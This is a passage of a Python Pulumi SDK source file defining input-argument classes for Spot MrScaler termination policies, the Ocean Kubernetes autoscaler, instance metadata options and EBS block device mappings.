        return pulumi.get(self, "action_type")

    @action_type.setter
    def action_type(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "action_type", value)

    @property
    @pulumi.getter
    def adjustment(self) -> Optional[pulumi.Input[str]]:
        """Number of instances to add/remove to/from the target capacity when scaling is required."""
        return pulumi.get(self, "adjustment")

    @adjustment.setter
    def adjustment(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "adjustment", value)

    @property
    @pulumi.getter
    def cooldown(self) -> Optional[pulumi.Input[int]]:
        """Time, in seconds, that must elapse after a scaling activity completes before the next one may start."""
        return pulumi.get(self, "cooldown")

    @cooldown.setter
    def cooldown(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "cooldown", value)

    @property
    @pulumi.getter
    def dimensions(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
        """Mapping of dimensions describing qualities of the metric."""
        return pulumi.get(self, "dimensions")

    @dimensions.setter
    def dimensions(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
        pulumi.set(self, "dimensions", value)

    @property
    @pulumi.getter(name="evaluationPeriods")
    def evaluation_periods(self) -> Optional[pulumi.Input[int]]:
        """Number of periods over which data is compared to the specified threshold."""
        return pulumi.get(self, "evaluation_periods")

    @evaluation_periods.setter
    def evaluation_periods(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "evaluation_periods", value)

    @property
    @pulumi.getter(name="maxTargetCapacity")
    def max_target_capacity(self) -> Optional[pulumi.Input[str]]:
        """Max target capacity for scale down."""
        return pulumi.get(self, "max_target_capacity")

    @max_target_capacity.setter
    def max_target_capacity(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "max_target_capacity", value)

    @property
    @pulumi.getter
    def maximum(self) -> Optional[pulumi.Input[str]]:
        """Maximum to set when scaling is required."""
        return pulumi.get(self, "maximum")

    @maximum.setter
    def maximum(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "maximum", value)

    @property
    @pulumi.getter(name="minTargetCapacity")
    def min_target_capacity(self) -> Optional[pulumi.Input[str]]:
        """Min target capacity for scale up."""
        return pulumi.get(self, "min_target_capacity")

    @min_target_capacity.setter
    def min_target_capacity(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "min_target_capacity", value)

    @property
    @pulumi.getter
    def minimum(self) -> Optional[pulumi.Input[str]]:
        """Minimum to set when scaling is required."""
        return pulumi.get(self, "minimum")

    @minimum.setter
    def minimum(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "minimum", value)

    @property
    @pulumi.getter
    def operator(self) -> Optional[pulumi.Input[str]]:
        """Comparison operator used to decide whether the policy applies. Valid values: `gt` | `gte` | `lt` | `lte`"""
        return pulumi.get(self, "operator")

    @operator.setter
    def operator(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "operator", value)

    @property
    @pulumi.getter
    def period(self) -> Optional[pulumi.Input[int]]:
        """Time window, in seconds, over which the statistic is applied."""
        return pulumi.get(self, "period")

    @period.setter
    def period(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "period", value)

    @property
    @pulumi.getter
    def statistic(self) -> Optional[pulumi.Input[str]]:
        """Aggregation method for the metric. Valid Values: `average` | `sum` | `sampleCount` | `maximum` | `minimum`"""
        return pulumi.get(self, "statistic")

    @statistic.setter
    def statistic(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "statistic", value)

    @property
    @pulumi.getter
    def target(self) -> Optional[pulumi.Input[str]]:
        """Number of instances to set when scaling is required."""
        return pulumi.get(self, "target")

    @target.setter
    def target(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "target", value)
@pulumi.input_type
class MrScalarTerminationPolicyArgs:
    """Input arguments for a MrScaler termination policy (a list of statement blocks)."""

    def __init__(__self__, *,
                 statements: pulumi.Input[Sequence[pulumi.Input['MrScalarTerminationPolicyStatementArgs']]]):
        """
        :param statements: The statement blocks attached to this termination policy.
        """
        pulumi.set(__self__, "statements", statements)

    @property
    @pulumi.getter
    def statements(self) -> pulumi.Input[Sequence[pulumi.Input['MrScalarTerminationPolicyStatementArgs']]]:
        """The statement blocks attached to this termination policy."""
        return pulumi.get(self, "statements")

    @statements.setter
    def statements(self, value: pulumi.Input[Sequence[pulumi.Input['MrScalarTerminationPolicyStatementArgs']]]):
        pulumi.set(self, "statements", value)
@pulumi.input_type
class MrScalarTerminationPolicyStatementArgs:
    """Input arguments for one CloudWatch-based statement of a MrScaler termination policy."""

    def __init__(__self__, *,
                 metric_name: pulumi.Input[str],
                 namespace: pulumi.Input[str],
                 threshold: pulumi.Input[float],
                 evaluation_periods: Optional[pulumi.Input[int]] = None,
                 operator: Optional[pulumi.Input[str]] = None,
                 period: Optional[pulumi.Input[int]] = None,
                 statistic: Optional[pulumi.Input[str]] = None,
                 unit: Optional[pulumi.Input[str]] = None):
        """
        :param pulumi.Input[str] metric_name: Name of the CloudWatch metric this statement evaluates.
        :param pulumi.Input[str] namespace: CloudWatch namespace; must contain the value: `AWS/ElasticMapReduce`.
        :param pulumi.Input[float] threshold: Value against which the specified statistic is compared.
        :param pulumi.Input[int] evaluation_periods: Number of periods over which data is compared to the specified threshold.
        :param pulumi.Input[str] operator: Comparison operator used to decide whether the policy applies. Valid values: `gt` | `gte` | `lt` | `lte`
        :param pulumi.Input[int] period: Time window, in seconds, over which the statistic is applied.
        :param pulumi.Input[str] statistic: Aggregation method for the metric. Valid Values: `average` | `sum` | `sampleCount` | `maximum` | `minimum`
        :param pulumi.Input[str] unit: Unit of the metric. Valid Values: `seconds` | `microseconds` | `milliseconds` | `bytes` | `kilobytes` | `megabytes` | `gigabytes` | `terabytes` | `bits` | `kilobits` | `megabits` | `gigabits` | `terabits` | `percent` | `count` | `bytes/second` | `kilobytes/second` | `megabytes/second` | `gigabytes/second` | `terabytes/second` | `bits/second` | `kilobits/second` | `megabits/second` | `gigabits/second` | `terabits/second` | `count/second` | `none`
        """
        # Required statement fields are always recorded.
        pulumi.set(__self__, "metric_name", metric_name)
        pulumi.set(__self__, "namespace", namespace)
        pulumi.set(__self__, "threshold", threshold)
        # Optional fields are recorded only when the caller supplied them.
        for _key, _val in (
                ("evaluation_periods", evaluation_periods),
                ("operator", operator),
                ("period", period),
                ("statistic", statistic),
                ("unit", unit)):
            if _val is not None:
                pulumi.set(__self__, _key, _val)

    @property
    @pulumi.getter(name="metricName")
    def metric_name(self) -> pulumi.Input[str]:
        """Name of the CloudWatch metric this statement evaluates."""
        return pulumi.get(self, "metric_name")

    @metric_name.setter
    def metric_name(self, value: pulumi.Input[str]):
        pulumi.set(self, "metric_name", value)

    @property
    @pulumi.getter
    def namespace(self) -> pulumi.Input[str]:
        """CloudWatch namespace; must contain the value: `AWS/ElasticMapReduce`."""
        return pulumi.get(self, "namespace")

    @namespace.setter
    def namespace(self, value: pulumi.Input[str]):
        pulumi.set(self, "namespace", value)

    @property
    @pulumi.getter
    def threshold(self) -> pulumi.Input[float]:
        """Value against which the specified statistic is compared."""
        return pulumi.get(self, "threshold")

    @threshold.setter
    def threshold(self, value: pulumi.Input[float]):
        pulumi.set(self, "threshold", value)

    @property
    @pulumi.getter(name="evaluationPeriods")
    def evaluation_periods(self) -> Optional[pulumi.Input[int]]:
        """Number of periods over which data is compared to the specified threshold."""
        return pulumi.get(self, "evaluation_periods")

    @evaluation_periods.setter
    def evaluation_periods(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "evaluation_periods", value)

    @property
    @pulumi.getter
    def operator(self) -> Optional[pulumi.Input[str]]:
        """Comparison operator used to decide whether the policy applies. Valid values: `gt` | `gte` | `lt` | `lte`"""
        return pulumi.get(self, "operator")

    @operator.setter
    def operator(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "operator", value)

    @property
    @pulumi.getter
    def period(self) -> Optional[pulumi.Input[int]]:
        """Time window, in seconds, over which the statistic is applied."""
        return pulumi.get(self, "period")

    @period.setter
    def period(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "period", value)

    @property
    @pulumi.getter
    def statistic(self) -> Optional[pulumi.Input[str]]:
        """Aggregation method for the metric. Valid Values: `average` | `sum` | `sampleCount` | `maximum` | `minimum`"""
        return pulumi.get(self, "statistic")

    @statistic.setter
    def statistic(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "statistic", value)

    @property
    @pulumi.getter
    def unit(self) -> Optional[pulumi.Input[str]]:
        """Unit of the metric. Valid Values: `seconds` | `microseconds` | `milliseconds` | `bytes` | `kilobytes` | `megabytes` | `gigabytes` | `terabytes` | `bits` | `kilobits` | `megabits` | `gigabits` | `terabits` | `percent` | `count` | `bytes/second` | `kilobytes/second` | `megabytes/second` | `gigabytes/second` | `terabytes/second` | `bits/second` | `kilobits/second` | `megabits/second` | `gigabits/second` | `terabits/second` | `count/second` | `none`"""
        return pulumi.get(self, "unit")

    @unit.setter
    def unit(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "unit", value)
@pulumi.input_type
class OceanAutoscalerArgs:
    """Input arguments configuring the Ocean Kubernetes Auto Scaler."""

    def __init__(__self__, *,
                 auto_headroom_percentage: Optional[pulumi.Input[int]] = None,
                 autoscale_cooldown: Optional[pulumi.Input[int]] = None,
                 autoscale_down: Optional[pulumi.Input['OceanAutoscalerAutoscaleDownArgs']] = None,
                 autoscale_headroom: Optional[pulumi.Input['OceanAutoscalerAutoscaleHeadroomArgs']] = None,
                 autoscale_is_auto_config: Optional[pulumi.Input[bool]] = None,
                 autoscale_is_enabled: Optional[pulumi.Input[bool]] = None,
                 resource_limits: Optional[pulumi.Input['OceanAutoscalerResourceLimitsArgs']] = None):
        """
        :param pulumi.Input[int] auto_headroom_percentage: Auto headroom percentage (a number in the range [0, 200]) controlling the percentage of headroom from the cluster. Relevant only when `autoscale_is_auto_config` is toggled on.
        :param pulumi.Input[int] autoscale_cooldown: Cooldown period between scaling actions.
        :param pulumi.Input['OceanAutoscalerAutoscaleDownArgs'] autoscale_down: Auto Scaling scale-down operations.
        :param pulumi.Input['OceanAutoscalerAutoscaleHeadroomArgs'] autoscale_headroom: Spare resource capacity management enabling fast assignment of Pods without waiting for new resources to launch.
        :param pulumi.Input[bool] autoscale_is_auto_config: Automatically configure and optimize headroom resources.
        :param pulumi.Input[bool] autoscale_is_enabled: Enable the Ocean Kubernetes Auto Scaler.
        :param pulumi.Input['OceanAutoscalerResourceLimitsArgs'] resource_limits: Optional upper and lower bounds on the resource usage of the cluster.
        """
        # Every field is optional; record only those the caller supplied.
        for _key, _val in (
                ("auto_headroom_percentage", auto_headroom_percentage),
                ("autoscale_cooldown", autoscale_cooldown),
                ("autoscale_down", autoscale_down),
                ("autoscale_headroom", autoscale_headroom),
                ("autoscale_is_auto_config", autoscale_is_auto_config),
                ("autoscale_is_enabled", autoscale_is_enabled),
                ("resource_limits", resource_limits)):
            if _val is not None:
                pulumi.set(__self__, _key, _val)

    @property
    @pulumi.getter(name="autoHeadroomPercentage")
    def auto_headroom_percentage(self) -> Optional[pulumi.Input[int]]:
        """Auto headroom percentage in [0, 200]; relevant only when `autoscale_is_auto_config` is toggled on."""
        return pulumi.get(self, "auto_headroom_percentage")

    @auto_headroom_percentage.setter
    def auto_headroom_percentage(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "auto_headroom_percentage", value)

    @property
    @pulumi.getter(name="autoscaleCooldown")
    def autoscale_cooldown(self) -> Optional[pulumi.Input[int]]:
        """Cooldown period between scaling actions."""
        return pulumi.get(self, "autoscale_cooldown")

    @autoscale_cooldown.setter
    def autoscale_cooldown(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "autoscale_cooldown", value)

    @property
    @pulumi.getter(name="autoscaleDown")
    def autoscale_down(self) -> Optional[pulumi.Input['OceanAutoscalerAutoscaleDownArgs']]:
        """Auto Scaling scale-down operations."""
        return pulumi.get(self, "autoscale_down")

    @autoscale_down.setter
    def autoscale_down(self, value: Optional[pulumi.Input['OceanAutoscalerAutoscaleDownArgs']]):
        pulumi.set(self, "autoscale_down", value)

    @property
    @pulumi.getter(name="autoscaleHeadroom")
    def autoscale_headroom(self) -> Optional[pulumi.Input['OceanAutoscalerAutoscaleHeadroomArgs']]:
        """Spare resource capacity management enabling fast assignment of Pods without waiting for new resources to launch."""
        return pulumi.get(self, "autoscale_headroom")

    @autoscale_headroom.setter
    def autoscale_headroom(self, value: Optional[pulumi.Input['OceanAutoscalerAutoscaleHeadroomArgs']]):
        pulumi.set(self, "autoscale_headroom", value)

    @property
    @pulumi.getter(name="autoscaleIsAutoConfig")
    def autoscale_is_auto_config(self) -> Optional[pulumi.Input[bool]]:
        """Automatically configure and optimize headroom resources."""
        return pulumi.get(self, "autoscale_is_auto_config")

    @autoscale_is_auto_config.setter
    def autoscale_is_auto_config(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "autoscale_is_auto_config", value)

    @property
    @pulumi.getter(name="autoscaleIsEnabled")
    def autoscale_is_enabled(self) -> Optional[pulumi.Input[bool]]:
        """Enable the Ocean Kubernetes Auto Scaler."""
        return pulumi.get(self, "autoscale_is_enabled")

    @autoscale_is_enabled.setter
    def autoscale_is_enabled(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "autoscale_is_enabled", value)

    @property
    @pulumi.getter(name="resourceLimits")
    def resource_limits(self) -> Optional[pulumi.Input['OceanAutoscalerResourceLimitsArgs']]:
        """Optional upper and lower bounds on the resource usage of the cluster."""
        return pulumi.get(self, "resource_limits")

    @resource_limits.setter
    def resource_limits(self, value: Optional[pulumi.Input['OceanAutoscalerResourceLimitsArgs']]):
        pulumi.set(self, "resource_limits", value)
@pulumi.input_type
class OceanAutoscalerAutoscaleDownArgs:
    """Input arguments for the Ocean autoscaler's scale-down behavior."""

    def __init__(__self__, *,
                 evaluation_periods: Optional[pulumi.Input[int]] = None,
                 max_scale_down_percentage: Optional[pulumi.Input[float]] = None):
        """
        :param pulumi.Input[int] evaluation_periods: Presumably the number of evaluation periods before scaling down — TODO confirm against provider docs.
        :param pulumi.Input[float] max_scale_down_percentage: Maximum percentage to scale down in one action. Number between 1-100.
        """
        # Both fields are optional; record only those the caller supplied.
        for _key, _val in (
                ("evaluation_periods", evaluation_periods),
                ("max_scale_down_percentage", max_scale_down_percentage)):
            if _val is not None:
                pulumi.set(__self__, _key, _val)

    @property
    @pulumi.getter(name="evaluationPeriods")
    def evaluation_periods(self) -> Optional[pulumi.Input[int]]:
        return pulumi.get(self, "evaluation_periods")

    @evaluation_periods.setter
    def evaluation_periods(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "evaluation_periods", value)

    @property
    @pulumi.getter(name="maxScaleDownPercentage")
    def max_scale_down_percentage(self) -> Optional[pulumi.Input[float]]:
        """Maximum percentage to scale down in one action. Number between 1-100."""
        return pulumi.get(self, "max_scale_down_percentage")

    @max_scale_down_percentage.setter
    def max_scale_down_percentage(self, value: Optional[pulumi.Input[float]]):
        pulumi.set(self, "max_scale_down_percentage", value)
@pulumi.input_type
class OceanAutoscalerAutoscaleHeadroomArgs:
    """Input arguments describing the spare capacity (headroom) units the Ocean autoscaler keeps available."""

    def __init__(__self__, *,
                 cpu_per_unit: Optional[pulumi.Input[int]] = None,
                 gpu_per_unit: Optional[pulumi.Input[int]] = None,
                 memory_per_unit: Optional[pulumi.Input[int]] = None,
                 num_of_units: Optional[pulumi.Input[int]] = None):
        """
        :param pulumi.Input[int] cpu_per_unit: CPUs to allocate per headroom unit, in millicores (1000 millicores = 1 vCPU).
        :param pulumi.Input[int] gpu_per_unit: GPUs to allocate per headroom unit.
        :param pulumi.Input[int] memory_per_unit: Memory (MB) to allocate per headroom unit.
        :param pulumi.Input[int] num_of_units: Number of units to retain as headroom, where each unit has the defined headroom CPU and memory.
        """
        # All fields are optional; record only those the caller supplied.
        for _key, _val in (
                ("cpu_per_unit", cpu_per_unit),
                ("gpu_per_unit", gpu_per_unit),
                ("memory_per_unit", memory_per_unit),
                ("num_of_units", num_of_units)):
            if _val is not None:
                pulumi.set(__self__, _key, _val)

    @property
    @pulumi.getter(name="cpuPerUnit")
    def cpu_per_unit(self) -> Optional[pulumi.Input[int]]:
        """CPUs to allocate per headroom unit, in millicores (1000 millicores = 1 vCPU)."""
        return pulumi.get(self, "cpu_per_unit")

    @cpu_per_unit.setter
    def cpu_per_unit(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "cpu_per_unit", value)

    @property
    @pulumi.getter(name="gpuPerUnit")
    def gpu_per_unit(self) -> Optional[pulumi.Input[int]]:
        """GPUs to allocate per headroom unit."""
        return pulumi.get(self, "gpu_per_unit")

    @gpu_per_unit.setter
    def gpu_per_unit(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "gpu_per_unit", value)

    @property
    @pulumi.getter(name="memoryPerUnit")
    def memory_per_unit(self) -> Optional[pulumi.Input[int]]:
        """Memory (MB) to allocate per headroom unit."""
        return pulumi.get(self, "memory_per_unit")

    @memory_per_unit.setter
    def memory_per_unit(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "memory_per_unit", value)

    @property
    @pulumi.getter(name="numOfUnits")
    def num_of_units(self) -> Optional[pulumi.Input[int]]:
        """Number of units to retain as headroom, where each unit has the defined headroom CPU and memory."""
        return pulumi.get(self, "num_of_units")

    @num_of_units.setter
    def num_of_units(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "num_of_units", value)
@pulumi.input_type
class OceanAutoscalerResourceLimitsArgs:
    """Input arguments bounding the total resources the Ocean autoscaler may allocate to the cluster."""

    def __init__(__self__, *,
                 max_memory_gib: Optional[pulumi.Input[int]] = None,
                 max_vcpu: Optional[pulumi.Input[int]] = None):
        """
        :param pulumi.Input[int] max_memory_gib: Maximum memory, in GiB units, that can be allocated to the cluster.
        :param pulumi.Input[int] max_vcpu: Maximum CPU, in vCPU units, that can be allocated to the cluster.
        """
        # Both limits are optional; record only those the caller supplied.
        for _key, _val in (
                ("max_memory_gib", max_memory_gib),
                ("max_vcpu", max_vcpu)):
            if _val is not None:
                pulumi.set(__self__, _key, _val)

    @property
    @pulumi.getter(name="maxMemoryGib")
    def max_memory_gib(self) -> Optional[pulumi.Input[int]]:
        """Maximum memory, in GiB units, that can be allocated to the cluster."""
        return pulumi.get(self, "max_memory_gib")

    @max_memory_gib.setter
    def max_memory_gib(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "max_memory_gib", value)

    @property
    @pulumi.getter(name="maxVcpu")
    def max_vcpu(self) -> Optional[pulumi.Input[int]]:
        """Maximum CPU, in vCPU units, that can be allocated to the cluster."""
        return pulumi.get(self, "max_vcpu")

    @max_vcpu.setter
    def max_vcpu(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "max_vcpu", value)
@pulumi.input_type
class OceanInstanceMetadataOptionsArgs:
    """Input arguments for EC2 instance metadata service (IMDS) options on Ocean instances."""

    def __init__(__self__, *,
                 http_tokens: pulumi.Input[str],
                 http_put_response_hop_limit: Optional[pulumi.Input[int]] = None):
        """
        :param pulumi.Input[str] http_tokens: Whether a signed token is required for metadata requests. Valid values: `optional` or `required`.
        :param pulumi.Input[int] http_put_response_hop_limit: Desired HTTP PUT response hop limit for instance metadata requests, an integer from 1 through 64. The larger the number, the further the instance metadata requests can travel.
        """
        # http_tokens is mandatory; the hop limit is recorded only when supplied.
        pulumi.set(__self__, "http_tokens", http_tokens)
        if http_put_response_hop_limit is not None:
            pulumi.set(__self__, "http_put_response_hop_limit", http_put_response_hop_limit)

    @property
    @pulumi.getter(name="httpTokens")
    def http_tokens(self) -> pulumi.Input[str]:
        """Whether a signed token is required for metadata requests. Valid values: `optional` or `required`."""
        return pulumi.get(self, "http_tokens")

    @http_tokens.setter
    def http_tokens(self, value: pulumi.Input[str]):
        pulumi.set(self, "http_tokens", value)

    @property
    @pulumi.getter(name="httpPutResponseHopLimit")
    def http_put_response_hop_limit(self) -> Optional[pulumi.Input[int]]:
        """Desired HTTP PUT response hop limit for instance metadata requests, an integer from 1 through 64."""
        return pulumi.get(self, "http_put_response_hop_limit")

    @http_put_response_hop_limit.setter
    def http_put_response_hop_limit(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "http_put_response_hop_limit", value)
@pulumi.input_type
class OceanLaunchSpecAutoscaleHeadroomArgs:
    """Headroom (spare capacity reserved for fast scheduling) for a Virtual Node Group."""

    def __init__(__self__, *,
                 num_of_units: pulumi.Input[int],
                 cpu_per_unit: Optional[pulumi.Input[int]] = None,
                 gpu_per_unit: Optional[pulumi.Input[int]] = None,
                 memory_per_unit: Optional[pulumi.Input[int]] = None):
        """
        :param pulumi.Input[int] num_of_units: The number of units to retain as headroom, where each unit has the defined headroom CPU, memory and GPU.
        :param pulumi.Input[int] cpu_per_unit: Optionally configure the number of CPUs to allocate for each headroom unit. CPUs are denoted in millicores, where 1000 millicores = 1 vCPU.
        :param pulumi.Input[int] gpu_per_unit: Optionally configure the number of GPUS to allocate for each headroom unit.
        :param pulumi.Input[int] memory_per_unit: Optionally configure the amount of memory (MiB) to allocate for each headroom unit.
        """
        # num_of_units is required; the per-unit resource amounts are optional.
        pulumi.set(__self__, "num_of_units", num_of_units)
        if cpu_per_unit is not None:
            pulumi.set(__self__, "cpu_per_unit", cpu_per_unit)
        if gpu_per_unit is not None:
            pulumi.set(__self__, "gpu_per_unit", gpu_per_unit)
        if memory_per_unit is not None:
            pulumi.set(__self__, "memory_per_unit", memory_per_unit)

    @property
    @pulumi.getter(name="numOfUnits")
    def num_of_units(self) -> pulumi.Input[int]:
        """
        The number of units to retain as headroom, where each unit has the defined headroom CPU, memory and GPU.
        """
        return pulumi.get(self, "num_of_units")

    @num_of_units.setter
    def num_of_units(self, value: pulumi.Input[int]):
        pulumi.set(self, "num_of_units", value)

    @property
    @pulumi.getter(name="cpuPerUnit")
    def cpu_per_unit(self) -> Optional[pulumi.Input[int]]:
        """
        Optionally configure the number of CPUs to allocate for each headroom unit. CPUs are denoted in millicores, where 1000 millicores = 1 vCPU.
        """
        return pulumi.get(self, "cpu_per_unit")

    @cpu_per_unit.setter
    def cpu_per_unit(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "cpu_per_unit", value)

    @property
    @pulumi.getter(name="gpuPerUnit")
    def gpu_per_unit(self) -> Optional[pulumi.Input[int]]:
        """
        Optionally configure the number of GPUS to allocate for each headroom unit.
        """
        return pulumi.get(self, "gpu_per_unit")

    @gpu_per_unit.setter
    def gpu_per_unit(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "gpu_per_unit", value)

    @property
    @pulumi.getter(name="memoryPerUnit")
    def memory_per_unit(self) -> Optional[pulumi.Input[int]]:
        """
        Optionally configure the amount of memory (MiB) to allocate for each headroom unit.
        """
        return pulumi.get(self, "memory_per_unit")

    @memory_per_unit.setter
    def memory_per_unit(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "memory_per_unit", value)
@pulumi.input_type
class OceanLaunchSpecBlockDeviceMappingArgs:
    """A single block device mapping entry for instances launched from this Virtual Node Group."""

    def __init__(__self__, *,
                 device_name: Optional[pulumi.Input[str]] = None,
                 ebs: Optional[pulumi.Input['OceanLaunchSpecBlockDeviceMappingEbsArgs']] = None,
                 no_device: Optional[pulumi.Input[str]] = None,
                 virtual_name: Optional[pulumi.Input[str]] = None):
        """
        :param pulumi.Input[str] device_name: String. Set device name. (Example: `/dev/xvda`).
        :param pulumi.Input['OceanLaunchSpecBlockDeviceMappingEbsArgs'] ebs: Object. Set Elastic Block Store properties .
        :param pulumi.Input[str] no_device: String. Suppresses the specified device included in the block device mapping of the AMI.
        :param pulumi.Input[str] virtual_name: String. The virtual device name. NOTE(review): undocumented in this file — presumably an instance-store mapping name such as `ephemeral0`; confirm against the Spot API docs.
        """
        if device_name is not None:
            pulumi.set(__self__, "device_name", device_name)
        if ebs is not None:
            pulumi.set(__self__, "ebs", ebs)
        if no_device is not None:
            pulumi.set(__self__, "no_device", no_device)
        if virtual_name is not None:
            pulumi.set(__self__, "virtual_name", virtual_name)

    @property
    @pulumi.getter(name="deviceName")
    def device_name(self) -> Optional[pulumi.Input[str]]:
        """
        String. Set device name. (Example: `/dev/xvda`).
        """
        return pulumi.get(self, "device_name")

    @device_name.setter
    def device_name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "device_name", value)

    @property
    @pulumi.getter
    def ebs(self) -> Optional[pulumi.Input['OceanLaunchSpecBlockDeviceMappingEbsArgs']]:
        """
        Object. Set Elastic Block Store properties .
        """
        return pulumi.get(self, "ebs")

    @ebs.setter
    def ebs(self, value: Optional[pulumi.Input['OceanLaunchSpecBlockDeviceMappingEbsArgs']]):
        pulumi.set(self, "ebs", value)

    @property
    @pulumi.getter(name="noDevice")
    def no_device(self) -> Optional[pulumi.Input[str]]:
        """
        String. Suppresses the specified device included in the block device mapping of the AMI.
        """
        return pulumi.get(self, "no_device")

    @no_device.setter
    def no_device(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "no_device", value)

    @property
    @pulumi.getter(name="virtualName")
    def virtual_name(self) -> Optional[pulumi.Input[str]]:
        """
        String. The virtual device name. NOTE(review): undocumented in this file — confirm semantics against the Spot API docs.
        """
        return pulumi.get(self, "virtual_name")

    @virtual_name.setter
    def virtual_name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "virtual_name", value)
@pulumi.input_type
class OceanLaunchSpecBlockDeviceMappingEbsArgs:
    """Elastic Block Store (EBS) volume properties for a block device mapping."""

    def __init__(__self__, *,
                 delete_on_termination: Optional[pulumi.Input[bool]] = None,
                 dynamic_volume_size: Optional[pulumi.Input['OceanLaunchSpecBlockDeviceMappingEbsDynamicVolumeSizeArgs']] = None,
                 encrypted: Optional[pulumi.Input[bool]] = None,
                 iops: Optional[pulumi.Input[int]] = None,
                 kms_key_id: Optional[pulumi.Input[str]] = None,
                 snapshot_id: Optional[pulumi.Input[str]] = None,
                 throughput: Optional[pulumi.Input[int]] = None,
                 volume_size: Optional[pulumi.Input[int]] = None,
                 volume_type: Optional[pulumi.Input[str]] = None):
        """
        :param pulumi.Input[bool] delete_on_termination: Boolean. Flag to delete the EBS on instance termination.
        :param pulumi.Input['OceanLaunchSpecBlockDeviceMappingEbsDynamicVolumeSizeArgs'] dynamic_volume_size: Object. Set dynamic volume size properties. When using this object, you cannot use volumeSize. You must use one or the other.
        :param pulumi.Input[bool] encrypted: Boolean. Enables [EBS encryption](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/EBSEncryption.html) on the volume.
        :param pulumi.Input[int] iops: Int. The number of I/O operations per second (IOPS) that the volume supports.
        :param pulumi.Input[str] kms_key_id: String. Identifier (key ID, key alias, ID ARN, or alias ARN) for a customer managed CMK under which the EBS volume is encrypted.
        :param pulumi.Input[str] snapshot_id: (Optional) String. The Snapshot ID to mount by.
        :param pulumi.Input[int] throughput: The amount of data transferred to or from a storage device per second, you can use this param just in a case that `volume_type` = `gp3`.
        :param pulumi.Input[int] volume_size: Int. The size, in GB of the volume.
        :param pulumi.Input[str] volume_type: String. The type of the volume. (Example: `gp2`).
        """
        # All fields are optional; only provided values are stored so the
        # provider can fall back to its own defaults for the rest.
        if delete_on_termination is not None:
            pulumi.set(__self__, "delete_on_termination", delete_on_termination)
        if dynamic_volume_size is not None:
            pulumi.set(__self__, "dynamic_volume_size", dynamic_volume_size)
        if encrypted is not None:
            pulumi.set(__self__, "encrypted", encrypted)
        if iops is not None:
            pulumi.set(__self__, "iops", iops)
        if kms_key_id is not None:
            pulumi.set(__self__, "kms_key_id", kms_key_id)
        if snapshot_id is not None:
            pulumi.set(__self__, "snapshot_id", snapshot_id)
        if throughput is not None:
            pulumi.set(__self__, "throughput", throughput)
        if volume_size is not None:
            pulumi.set(__self__, "volume_size", volume_size)
        if volume_type is not None:
            pulumi.set(__self__, "volume_type", volume_type)

    @property
    @pulumi.getter(name="deleteOnTermination")
    def delete_on_termination(self) -> Optional[pulumi.Input[bool]]:
        """
        Boolean. Flag to delete the EBS on instance termination.
        """
        return pulumi.get(self, "delete_on_termination")

    @delete_on_termination.setter
    def delete_on_termination(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "delete_on_termination", value)

    @property
    @pulumi.getter(name="dynamicVolumeSize")
    def dynamic_volume_size(self) -> Optional[pulumi.Input['OceanLaunchSpecBlockDeviceMappingEbsDynamicVolumeSizeArgs']]:
        """
        Object. Set dynamic volume size properties. When using this object, you cannot use volumeSize. You must use one or the other.
        """
        return pulumi.get(self, "dynamic_volume_size")

    @dynamic_volume_size.setter
    def dynamic_volume_size(self, value: Optional[pulumi.Input['OceanLaunchSpecBlockDeviceMappingEbsDynamicVolumeSizeArgs']]):
        pulumi.set(self, "dynamic_volume_size", value)

    @property
    @pulumi.getter
    def encrypted(self) -> Optional[pulumi.Input[bool]]:
        """
        Boolean. Enables [EBS encryption](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/EBSEncryption.html) on the volume.
        """
        return pulumi.get(self, "encrypted")

    @encrypted.setter
    def encrypted(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "encrypted", value)

    @property
    @pulumi.getter
    def iops(self) -> Optional[pulumi.Input[int]]:
        """
        Int. The number of I/O operations per second (IOPS) that the volume supports.
        """
        return pulumi.get(self, "iops")

    @iops.setter
    def iops(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "iops", value)

    @property
    @pulumi.getter(name="kmsKeyId")
    def kms_key_id(self) -> Optional[pulumi.Input[str]]:
        """
        String. Identifier (key ID, key alias, ID ARN, or alias ARN) for a customer managed CMK under which the EBS volume is encrypted.
        """
        return pulumi.get(self, "kms_key_id")

    @kms_key_id.setter
